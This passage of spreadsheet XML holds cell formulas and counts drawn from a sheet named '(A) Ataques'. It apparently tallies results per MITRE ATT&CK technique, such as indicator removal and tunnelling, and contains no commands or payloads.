        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CK22,"")</f>
        <v>2</v>
      </c>
      <c r="AI22" s="287">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($AE22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ22" s="292">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CL22,"")</f>
        <v>0</v>
      </c>
      <c r="AK22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CN22,"")</f>
        <v>0</v>
      </c>
      <c r="AL22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CP22,"")</f>
        <v>0</v>
      </c>
      <c r="AM22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CQ22,"")</f>
        <v>0</v>
      </c>
      <c r="AN22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($AJ22=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CR22,"")</f>
        <v>5</v>
      </c>
      <c r="AP22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CT22,"")</f>
        <v>3</v>
      </c>
      <c r="AQ22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CV22,"")</f>
        <v>3</v>
      </c>
      <c r="AR22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CW22,"")</f>
        <v>1</v>
      </c>
      <c r="AS22" s="287">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($AO22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT22" s="288">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!CX22,"")</f>
        <v>20</v>
      </c>
      <c r="AU22" s="392">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!CZ22,"")</f>
        <v>8</v>
      </c>
      <c r="AV22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!DB22,"")</f>
        <v>8</v>
      </c>
      <c r="AW22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!DC22,"")</f>
        <v>2</v>
      </c>
      <c r="AX22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($AT22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY22" s="469">
        <f>'(A) Ataques'!LU22+'(A) Ataques'!MA22+'(A) Ataques'!MG22+'(A) Ataques'!MM22+'(A) Ataques'!MS22</f>
        <v>4</v>
      </c>
      <c r="AZ22" s="510">
        <f>'(A) Ataques'!LW22+'(A) Ataques'!MC22+'(A) Ataques'!MI22+'(A) Ataques'!MO22+'(A) Ataques'!MU22</f>
        <v>3</v>
      </c>
      <c r="BA22" s="471">
        <f>'(A) Ataques'!LY22+'(A) Ataques'!ME22+'(A) Ataques'!MK22+'(A) Ataques'!MQ22+'(A) Ataques'!MW22</f>
        <v>2</v>
      </c>
      <c r="BB22" s="471">
        <f>'(A) Ataques'!LQ22</f>
        <v>3</v>
      </c>
      <c r="BC22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($AY22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD22" s="469">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!LL22,"")</f>
        <v>6</v>
      </c>
      <c r="BE22" s="510">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!LM22,"")</f>
        <v>5</v>
      </c>
      <c r="BF22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!LN22,"")</f>
        <v>2</v>
      </c>
      <c r="BG22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!LO22,"")</f>
        <v>1</v>
      </c>
      <c r="BH22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!LS22,"")</f>
        <v>3</v>
      </c>
      <c r="BI22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($BD22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ22" s="469">
        <f>'(A) Ataques'!OL22+'(A) Ataques'!OR22+'(A) Ataques'!OX22+'(A) Ataques'!PD22+'(A) Ataques'!PJ22</f>
        <v>12</v>
      </c>
      <c r="BK22" s="510">
        <f>'(A) Ataques'!ON22+'(A) Ataques'!OT22+'(A) Ataques'!OZ22+'(A) Ataques'!PF22+'(A) Ataques'!PL22</f>
        <v>2</v>
      </c>
      <c r="BL22" s="471">
        <f>'(A) Ataques'!OP22+'(A) Ataques'!OV22+'(A) Ataques'!PB22+'(A) Ataques'!PH22+'(A) Ataques'!PN22</f>
        <v>2</v>
      </c>
      <c r="BM22" s="495">
        <f>'(A) Ataques'!OH22</f>
        <v>1</v>
      </c>
      <c r="BN22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($BJ22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO22" s="469">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!OC22,"")</f>
        <v>12</v>
      </c>
      <c r="BP22" s="510">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!OD22,"")</f>
        <v>2</v>
      </c>
      <c r="BQ22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!OE22,"")</f>
        <v>2</v>
      </c>
      <c r="BR22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!OF22,"")</f>
        <v>1</v>
      </c>
      <c r="BS22" s="471">
        <f>IF('(A) Ataques'!$AP22&lt;&gt;"NO",'(A) Ataques'!OJ22,"")</f>
        <v>1</v>
      </c>
      <c r="BT22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($BO22=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A23" s="79">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
      <c r="B23" s="4">
        <f>IF('(A) Ataques'!AK23&lt;&gt;"NO",'(A) Ataques'!E23,"")</f>
        <v>17</v>
      </c>
      <c r="C23" s="6" t="str">
        <f>IF('(A) Ataques'!AK23&lt;&gt;"NO",IF('(A) Ataques'!M23="","",'(A) Ataques'!M23),"")</f>
        <v>T1070.005-Indicator_removal_network_share_connection_removal</v>
      </c>
      <c r="D23" s="4" t="str">
        <f>IF('(A) Ataques'!AK23&lt;&gt;"NO",'(A) Ataques'!F23,"")</f>
        <v>T1070</v>
      </c>
      <c r="E23" s="286">
        <f>IF('(A) Ataques'!AK23&lt;&gt;"NO",'(A) Ataques'!AQ23,"")</f>
        <v>1</v>
      </c>
      <c r="F23" s="288">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!BB23,"")</f>
        <v>0</v>
      </c>
      <c r="G23" s="392">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!BD23,"")</f>
        <v>0</v>
      </c>
      <c r="H23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!BF23,"")</f>
        <v>0</v>
      </c>
      <c r="I23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!BG23,"")</f>
        <v>0</v>
      </c>
      <c r="J23" s="530">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($F23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BH23,"")</f>
        <v>0</v>
      </c>
      <c r="L23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BJ23,"")</f>
        <v>0</v>
      </c>
      <c r="M23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BL23,"")</f>
        <v>0</v>
      </c>
      <c r="N23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BM23,"")</f>
        <v>0</v>
      </c>
      <c r="O23" s="532">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($K23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P23" s="292">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BN23,"")</f>
        <v>0</v>
      </c>
      <c r="Q23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BP23,"")</f>
        <v>0</v>
      </c>
      <c r="R23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BR23,"")</f>
        <v>0</v>
      </c>
      <c r="S23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BS23,"")</f>
        <v>0</v>
      </c>
      <c r="T23" s="530">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($P23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BT23,"")</f>
        <v>0</v>
      </c>
      <c r="V23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BV23,"")</f>
        <v>0</v>
      </c>
      <c r="W23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BX23,"")</f>
        <v>0</v>
      </c>
      <c r="X23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$BY23,"")</f>
        <v>0</v>
      </c>
      <c r="Y23" s="532">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($U23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z23" s="288">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!BZ23,"")</f>
        <v>11</v>
      </c>
      <c r="AA23" s="392">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!CB23,"")</f>
        <v>11</v>
      </c>
      <c r="AB23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!CD23,"")</f>
        <v>11</v>
      </c>
      <c r="AC23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!CE23,"")</f>
        <v>1</v>
      </c>
      <c r="AD23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF(Z23=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CF23,"")</f>
        <v>11</v>
      </c>
      <c r="AF23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CH23,"")</f>
        <v>11</v>
      </c>
      <c r="AG23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CJ23,"")</f>
        <v>11</v>
      </c>
      <c r="AH23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CK23,"")</f>
        <v>1</v>
      </c>
      <c r="AI23" s="287">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($AE23=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ23" s="292">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CL23,"")</f>
        <v>0</v>
      </c>
      <c r="AK23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CN23,"")</f>
        <v>0</v>
      </c>
      <c r="AL23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CP23,"")</f>
        <v>0</v>
      </c>
      <c r="AM23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CQ23,"")</f>
        <v>0</v>
      </c>
      <c r="AN23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($AJ23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CR23,"")</f>
        <v>0</v>
      </c>
      <c r="AP23" s="322">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CT23,"")</f>
        <v>0</v>
      </c>
      <c r="AQ23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CV23,"")</f>
        <v>0</v>
      </c>
      <c r="AR23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!$CW23,"")</f>
        <v>0</v>
      </c>
      <c r="AS23" s="287">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($AO23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT23" s="288">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!CX23,"")</f>
        <v>0</v>
      </c>
      <c r="AU23" s="392">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!CZ23,"")</f>
        <v>0</v>
      </c>
      <c r="AV23" s="4">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!DB23,"")</f>
        <v>0</v>
      </c>
      <c r="AW23" s="20">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",'(A) Ataques'!DC23,"")</f>
        <v>0</v>
      </c>
      <c r="AX23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($AT23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY23" s="469">
        <f>'(A) Ataques'!LU23+'(A) Ataques'!MA23+'(A) Ataques'!MG23+'(A) Ataques'!MM23+'(A) Ataques'!MS23</f>
        <v>0</v>
      </c>
      <c r="AZ23" s="510">
        <f>'(A) Ataques'!LW23+'(A) Ataques'!MC23+'(A) Ataques'!MI23+'(A) Ataques'!MO23+'(A) Ataques'!MU23</f>
        <v>0</v>
      </c>
      <c r="BA23" s="471">
        <f>'(A) Ataques'!LY23+'(A) Ataques'!ME23+'(A) Ataques'!MK23+'(A) Ataques'!MQ23+'(A) Ataques'!MW23</f>
        <v>0</v>
      </c>
      <c r="BB23" s="471">
        <f>'(A) Ataques'!LQ23</f>
        <v>0</v>
      </c>
      <c r="BC23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($AY23=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD23" s="469">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!LL23,"")</f>
        <v>5</v>
      </c>
      <c r="BE23" s="510">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!LM23,"")</f>
        <v>4</v>
      </c>
      <c r="BF23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!LN23,"")</f>
        <v>0</v>
      </c>
      <c r="BG23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!LO23,"")</f>
        <v>4</v>
      </c>
      <c r="BH23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!LS23,"")</f>
        <v>1</v>
      </c>
      <c r="BI23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($BD23=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ23" s="469">
        <f>'(A) Ataques'!OL23+'(A) Ataques'!OR23+'(A) Ataques'!OX23+'(A) Ataques'!PD23+'(A) Ataques'!PJ23</f>
        <v>1</v>
      </c>
      <c r="BK23" s="510">
        <f>'(A) Ataques'!ON23+'(A) Ataques'!OT23+'(A) Ataques'!OZ23+'(A) Ataques'!PF23+'(A) Ataques'!PL23</f>
        <v>1</v>
      </c>
      <c r="BL23" s="471">
        <f>'(A) Ataques'!OP23+'(A) Ataques'!OV23+'(A) Ataques'!PB23+'(A) Ataques'!PH23+'(A) Ataques'!PN23</f>
        <v>1</v>
      </c>
      <c r="BM23" s="495">
        <f>'(A) Ataques'!OH23</f>
        <v>1</v>
      </c>
      <c r="BN23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($BJ23=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO23" s="469">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!OC23,"")</f>
        <v>1</v>
      </c>
      <c r="BP23" s="510">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!OD23,"")</f>
        <v>1</v>
      </c>
      <c r="BQ23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!OE23,"")</f>
        <v>1</v>
      </c>
      <c r="BR23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!OF23,"")</f>
        <v>1</v>
      </c>
      <c r="BS23" s="471">
        <f>IF('(A) Ataques'!$AP23&lt;&gt;"NO",'(A) Ataques'!OJ23,"")</f>
        <v>1</v>
      </c>
      <c r="BT23" s="331">
        <f>IF('(A) Ataques'!$AK23&lt;&gt;"NO",IF($BO23=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A24" s="79">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
      <c r="B24" s="4">
        <f>IF('(A) Ataques'!AK24&lt;&gt;"NO",'(A) Ataques'!E24,"")</f>
        <v>18</v>
      </c>
      <c r="C24" s="6" t="str">
        <f>IF('(A) Ataques'!AK24&lt;&gt;"NO",IF('(A) Ataques'!M24="","",'(A) Ataques'!M24),"")</f>
        <v>T1071.004-Tunel</v>
      </c>
      <c r="D24" s="4" t="str">
        <f>IF('(A) Ataques'!AK24&lt;&gt;"NO",'(A) Ataques'!F24,"")</f>
        <v>T1071</v>
      </c>
      <c r="E24" s="286">
        <f>IF('(A) Ataques'!AK24&lt;&gt;"NO",'(A) Ataques'!AQ24,"")</f>
        <v>198</v>
      </c>
      <c r="F24" s="288">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!BB24,"")</f>
        <v>204</v>
      </c>
      <c r="G24" s="392">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!BD24,"")</f>
        <v>10</v>
      </c>
      <c r="H24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!BF24,"")</f>
        <v>1</v>
      </c>
      <c r="I24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!BG24,"")</f>
        <v>10</v>
      </c>
      <c r="J24" s="530">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($F24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BH24,"")</f>
        <v>0</v>
      </c>
      <c r="L24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BJ24,"")</f>
        <v>0</v>
      </c>
      <c r="M24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BL24,"")</f>
        <v>0</v>
      </c>
      <c r="N24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BM24,"")</f>
        <v>0</v>
      </c>
      <c r="O24" s="532">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($K24=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P24" s="292">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BN24,"")</f>
        <v>204</v>
      </c>
      <c r="Q24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BP24,"")</f>
        <v>10</v>
      </c>
      <c r="R24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BR24,"")</f>
        <v>1</v>
      </c>
      <c r="S24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BS24,"")</f>
        <v>10</v>
      </c>
      <c r="T24" s="530">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($P24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BT24,"")</f>
        <v>205</v>
      </c>
      <c r="V24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BV24,"")</f>
        <v>11</v>
      </c>
      <c r="W24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BX24,"")</f>
        <v>2</v>
      </c>
      <c r="X24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$BY24,"")</f>
        <v>11</v>
      </c>
      <c r="Y24" s="532">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($U24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z24" s="288">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!BZ24,"")</f>
        <v>106</v>
      </c>
      <c r="AA24" s="392">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!CB24,"")</f>
        <v>105</v>
      </c>
      <c r="AB24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!CD24,"")</f>
        <v>5</v>
      </c>
      <c r="AC24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!CE24,"")</f>
        <v>100</v>
      </c>
      <c r="AD24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF(Z24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CF24,"")</f>
        <v>311</v>
      </c>
      <c r="AF24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CH24,"")</f>
        <v>116</v>
      </c>
      <c r="AG24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CJ24,"")</f>
        <v>7</v>
      </c>
      <c r="AH24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CK24,"")</f>
        <v>107</v>
      </c>
      <c r="AI24" s="287">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($AE24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ24" s="292">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CL24,"")</f>
        <v>0</v>
      </c>
      <c r="AK24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CN24,"")</f>
        <v>0</v>
      </c>
      <c r="AL24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CP24,"")</f>
        <v>0</v>
      </c>
      <c r="AM24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CQ24,"")</f>
        <v>0</v>
      </c>
      <c r="AN24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($AJ24=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CR24,"")</f>
        <v>0</v>
      </c>
      <c r="AP24" s="322">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CT24,"")</f>
        <v>0</v>
      </c>
      <c r="AQ24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CV24,"")</f>
        <v>0</v>
      </c>
      <c r="AR24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!$CW24,"")</f>
        <v>0</v>
      </c>
      <c r="AS24" s="287">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($AO24=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT24" s="288">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!CX24,"")</f>
        <v>204</v>
      </c>
      <c r="AU24" s="392">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!CZ24,"")</f>
        <v>10</v>
      </c>
      <c r="AV24" s="4">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!DB24,"")</f>
        <v>1</v>
      </c>
      <c r="AW24" s="20">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",'(A) Ataques'!DC24,"")</f>
        <v>10</v>
      </c>
      <c r="AX24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($AT24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY24" s="469">
        <f>'(A) Ataques'!LU24+'(A) Ataques'!MA24+'(A) Ataques'!MG24+'(A) Ataques'!MM24+'(A) Ataques'!MS24</f>
        <v>20</v>
      </c>
      <c r="AZ24" s="510">
        <f>'(A) Ataques'!LW24+'(A) Ataques'!MC24+'(A) Ataques'!MI24+'(A) Ataques'!MO24+'(A) Ataques'!MU24</f>
        <v>10</v>
      </c>
      <c r="BA24" s="471">
        <f>'(A) Ataques'!LY24+'(A) Ataques'!ME24+'(A) Ataques'!MK24+'(A) Ataques'!MQ24+'(A) Ataques'!MW24</f>
        <v>1</v>
      </c>
      <c r="BB24" s="471">
        <f>'(A) Ataques'!LQ24</f>
        <v>10</v>
      </c>
      <c r="BC24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($AY24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD24" s="469">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!LL24,"")</f>
        <v>218</v>
      </c>
      <c r="BE24" s="510">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!LM24,"")</f>
        <v>208</v>
      </c>
      <c r="BF24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!LN24,"")</f>
        <v>1</v>
      </c>
      <c r="BG24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!LO24,"")</f>
        <v>2</v>
      </c>
      <c r="BH24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!LS24,"")</f>
        <v>198</v>
      </c>
      <c r="BI24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($BD24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ24" s="469">
        <f>'(A) Ataques'!OL24+'(A) Ataques'!OR24+'(A) Ataques'!OX24+'(A) Ataques'!PD24+'(A) Ataques'!PJ24</f>
        <v>5</v>
      </c>
      <c r="BK24" s="510">
        <f>'(A) Ataques'!ON24+'(A) Ataques'!OT24+'(A) Ataques'!OZ24+'(A) Ataques'!PF24+'(A) Ataques'!PL24</f>
        <v>5</v>
      </c>
      <c r="BL24" s="471">
        <f>'(A) Ataques'!OP24+'(A) Ataques'!OV24+'(A) Ataques'!PB24+'(A) Ataques'!PH24+'(A) Ataques'!PN24</f>
        <v>1</v>
      </c>
      <c r="BM24" s="495">
        <f>'(A) Ataques'!OH24</f>
        <v>5</v>
      </c>
      <c r="BN24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($BJ24=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO24" s="469">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!OC24,"")</f>
        <v>5</v>
      </c>
      <c r="BP24" s="510">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!OD24,"")</f>
        <v>5</v>
      </c>
      <c r="BQ24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!OE24,"")</f>
        <v>1</v>
      </c>
      <c r="BR24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!OF24,"")</f>
        <v>1</v>
      </c>
      <c r="BS24" s="471">
        <f>IF('(A) Ataques'!$AP24&lt;&gt;"NO",'(A) Ataques'!OJ24,"")</f>
        <v>5</v>
      </c>
      <c r="BT24" s="331">
        <f>IF('(A) Ataques'!$AK24&lt;&gt;"NO",IF($BO24=0,0,1),"")</f>
